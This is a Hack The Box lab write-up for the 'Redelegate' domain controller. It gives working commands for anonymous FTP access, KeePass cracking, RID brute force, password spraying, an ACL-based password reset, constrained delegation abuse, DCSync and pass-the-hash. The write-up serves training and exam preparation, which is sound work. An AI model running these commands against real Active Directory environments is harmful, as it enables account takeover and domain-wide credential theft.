HTB: Redelegate | Archwarden

Summary

Redelegate is a Windows domain controller that chains several misconfigurations across a realistic attack path. Anonymous FTP access exposes a KeePass database alongside training materials that hint directly at the password format in use. Cracking the database reveals SQL credentials used for RID brute force enumeration, and spraying those usernames with the same seasonal password pattern lands a domain credential. BloodHound maps an ACL chain through ForceChangePassword to a WinRM-capable account. Privilege escalation combines two misconfigurations: SeEnableDelegationPrivilege on Helen.Frost and GenericAll over the FS01$ machine account. Together they allow configuring constrained delegation on FS01$, impersonating the domain controller, and performing DCSync.

Flags:

User — FTP → KeePass cracking → password spray → ForceChangePassword → WinRM as helen.frost
Root — SeEnableDelegationPrivilege + GenericAll → constrained delegation → DCSync → pass-the-hash as Administrator

Detailed Walkthrough

Enumeration

Nmap Scan

Full TCP scan first:

sudo nmap -p- --min-rate 1000 -T4 10.129.234.50 -oA TCP_allports

Extract open ports and run detailed enumeration:

ports=$(grep open TCP_allports.nmap | awk -F/ '{print $1}' | tr '\n' ',' | sed 's/,$//')
sudo nmap -p $ports -sC -sV -vv -oA TCP_detailed 10.129.234.50

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd  [anonymous login allowed]
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows AD LDAP (Domain: redelegate.vl)
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00
3268/tcp open  ldap          Microsoft Windows AD LDAP (Domain: redelegate.vl)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)
9389/tcp open  mc-nmf        .NET Message Framing

21 (FTP) allows anonymous login and nmap already shows three files present — first thing to pull

88/389/3268 confirm a domain controller, domain is redelegate.vl

1433 (MSSQL) is open — worth testing any credentials we find

5985 (WinRM) is open — credentials will get us a shell

3389 (RDP) is available as a backup access method

The scan reported a ~3 hour clock skew. Fix it before any Kerberos operations:

sudo nano /etc/hosts
# 10.129.234.50  redelegate.vl dc.redelegate.vl

sudo ntpdate 10.129.234.50

FTP Anonymous Access

ftp 10.129.234.50

FTP anonymous login successful

Three files are present. Pull them all:

binary
mget *

Downloading all files from FTP

Read both text files before touching the KeePass database:

TrainingAgenda.txt — weak password training content hinting at SeasonYear! format

CyberAudit.txt — two items in progress: remove unused domain objects, recheck ACLs

The third training agenda talk is titled “Why SeasonYear! is not a good password”. This is a direct hint at the password convention in use. The audit document flags unused domain objects and ACL misconfigurations as open items, both worth keeping in mind later for lateral movement and privilege escalation.

KeePass Cracking

Build a seasonal password list going back four years:

Spring2026!
Summer2026!
Autumn2026!
Fall2026!
Winter2026!
Spring2025!
Summer2025!
Autumn2025!
Fall2025!
Winter2025!
Spring2024!
Summer2024!
Autumn2024!
Fall2024!
Winter2024!
Spring2023!
Summer2023!
Autumn2023!
Fall2023!
Winter2023!

Convert the KeePass database to a crackable hash and run it against the list:

keepass2john Shared.kdbx > Shared.kdbx.hash
john --wordlist=seasonal.txt Shared.kdbx.hash

John cracking the KeePass hash to Fall2024!

Master password: Fall2024!

Open the database:

KeePass database opened

Seven entries are stored inside. Testing each credential set against the available services, only SQLGuest authenticates:

KeePass entry showing SQLGuest credentials

nxc mssql 10.129.234.50 -u SQLGuest -p zDPBpaF4FywlqIv11vii --local-auth

NXC confirming SQLGuest credentials are valid against MSSQL

Finding 1 — Anonymous FTP Access Exposing KeePass Credential Store with Predictable Master Password

User Enumeration and Password Spray

With a valid MSSQL account, use RID brute force to enumerate domain users:

nxc mssql 10.129.234.50 -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --local-auth --rid-brute

RID brute force returning domain usernames

Build a user list from the results:

Administrator
Guest
Christine.Flanders
Marie.Curie
Helen.Frost
Michael.Pontiac
Mallory.Roberts
James.Dinkleberg
Ryan.Cooper
sql_svc

Spray the seasonal password list against all users over SMB:

nxc smb 10.129.234.50 -u users.txt -p seasonal.txt --continue-on-success

NXC password spray returning Marie.Curie:Fall2024!

One hit: Marie.Curie:Fall2024!

Active Directory Enumeration — BloodHound

Collect BloodHound data with valid credentials:

rusthound-ce -d redelegate.vl -u 'Marie.Curie' -p 'Fall2024!' -o ./bh -z

RustHound collecting BloodHound data

Start BloodHound and import the data:

bloodhound-start

BloodHound started

BloodHound login

Data ingested into BloodHound

Mark Marie.Curie as owned and run the shortest path from owned principals:

Marking Marie.Curie as owned in BloodHound

Running shortest paths from owned principals cypher

The graph reveals a clear ACL chain:

BloodHound map showing Marie.Curie → Helpdesk → ForceChangePassword → Helen.Frost → Remote Management Users

Marie.Curie is a member of Helpdesk
Helpdesk has ForceChangePassword over Helen.Frost
Helen.Frost is a member of Remote Management Users

The CyberAudit document mentioned ACLs being rechecked as an open item. The ForceChangePassword edge is exactly the kind of misconfiguration that audit was supposed to catch.

Foothold — WinRM as Helen.Frost

Reset Helen.Frost’s password via the ForceChangePassword right:

bloodyAD --host 10.129.234.50 -d redelegate.vl -u 'Marie.Curie' -p 'Fall2024!' set password Helen.Frost Password1!

bloodyAD resetting Helen.Frost's password via ForceChangePassword

evil-winrm -i 10.129.234.50 -u Helen.Frost -p 'Password1!'

Evil-WinRM session established as Helen.Frost, user flag retrieved

Finding 2 — ACL Misconfiguration Allowing Unauthorized Password Reset and Lateral Movement

Privilege Escalation

Identifying the Attack Surface

whoami /priv

whoami /priv showing SeEnableDelegationPrivilege

Helen.Frost holds SeEnableDelegationPrivilege, a privilege that allows configuring delegation settings on accounts, including setting the TRUSTED_TO_AUTH_FOR_DELEGATION flag and writing msDS-AllowedToDelegateTo. Back in BloodHound, her group membership reveals the second half of the attack:

BloodHound showing IT group has GenericAll over FS01$

Helen.Frost is a member of the IT group, which holds GenericAll over the FS01$ machine account. Combined with SeEnableDelegationPrivilege, the attack chain is:

Reset FS01$’s password via GenericAll
Set TRUSTED_TO_AUTH_FOR_DELEGATION on FS01$ via SeEnableDelegationPrivilege
Configure msDS-AllowedToDelegateTo targeting cifs/dc.redelegate.vl
Use FS01$’s TGT to request a service ticket impersonating the DC machine account via S4U2self + S4U2proxy
DCSync using that ticket

Configuring Constrained Delegation on FS01$

Get a TGT for Helen.Frost to authenticate bloodyAD via Kerberos:

impacket-getTGT redelegate.vl/HELEN.FROST:'Password1!'
export KRB5CCNAME=HELEN.FROST.ccache

getTGT returning a TGT for Helen.Frost

Exporting KRB5CCNAME for Helen.Frost

Reset FS01$’s password using Kerberos authentication:

bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" set password "FS01$" 'Password1!'

bloodyAD resetting FS01$ password via GenericAll

Confirm the credentials work:

nxc smb redelegate.vl -u FS01$ -p 'Password1!'

NXC confirming FS01$ credentials are valid

Set the TRUSTED_TO_AUTH_FOR_DELEGATION flag on FS01$:

bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" add uac FS01$ -f TRUSTED_TO_AUTH_FOR_DELEGATION

bloodyAD setting TRUSTED_TO_AUTH_FOR_DELEGATION on FS01$

Configure the delegation target:

bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" set object FS01$ msDS-AllowedToDelegateTo -v 'cifs/dc.redelegate.vl'

bloodyAD setting msDS-AllowedToDelegateTo to cifs/dc.redelegate.vl

S4U2self + S4U2proxy — Impersonating the Domain Controller

Get a TGT for FS01$:

impacket-getTGT redelegate.vl/fs01\$:'Password1!' -dc-ip 10.129.234.50
export KRB5CCNAME=fs01\$.ccache

getTGT returning a TGT for FS01$

Exporting KRB5CCNAME for FS01$

Request a service ticket impersonating the dc machine account against the CIFS service on the DC:

impacket-getST -k -no-pass redelegate.vl/fs01\$ -spn cifs/dc.redelegate.vl -impersonate dc -dc-ip 10.129.234.50

getST returning a service ticket impersonating the dc machine account

DCSync

export KRB5CCNAME=dc@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache

Exporting KRB5CCNAME for the CIFS service ticket

impacket-secretsdump -k dc.redelegate.vl -just-dc-user Administrator

secretsdump DCSync returning the Administrator NTLM hash

Administrator NTLM hash recovered: ec17f7a2a4d96e177bfd101b94ffc0a7

Finding 3 — SeEnableDelegationPrivilege Combined with GenericAll Allowing Constrained Delegation Configuration and Domain Compromise

Administrator Access

evil-winrm -i redelegate.vl -u Administrator -H 'ec17f7a2a4d96e177bfd101b94ffc0a7'

Evil-WinRM session as Administrator, root flag retrieved

Takeaways

How this box helped me prepare for the CPTS exam

Read everything you pull from FTP before touching binaries. The text files on this box handed over the password format directly. On engagements and the exam, treat documents as intelligence. They often tell you exactly what to try.
keepass2john into John or Hashcat is a standard workflow. KeePass databases appear regularly on Windows engagements. The conversion step is simple and the payoff is high. If you find a .kdbx, always crack it.
Run whoami /priv immediately after getting a foothold and look up anything non-standard. Most user accounts have a predictable baseline set of privileges. Anything outside that baseline was granted for a reason, and that reason often maps to an attack path. SeEnableDelegationPrivilege standing out on a helpdesk account is the kind of thing that gets missed if you only skim the output. Build the habit of checking every privilege against what a standard user should have.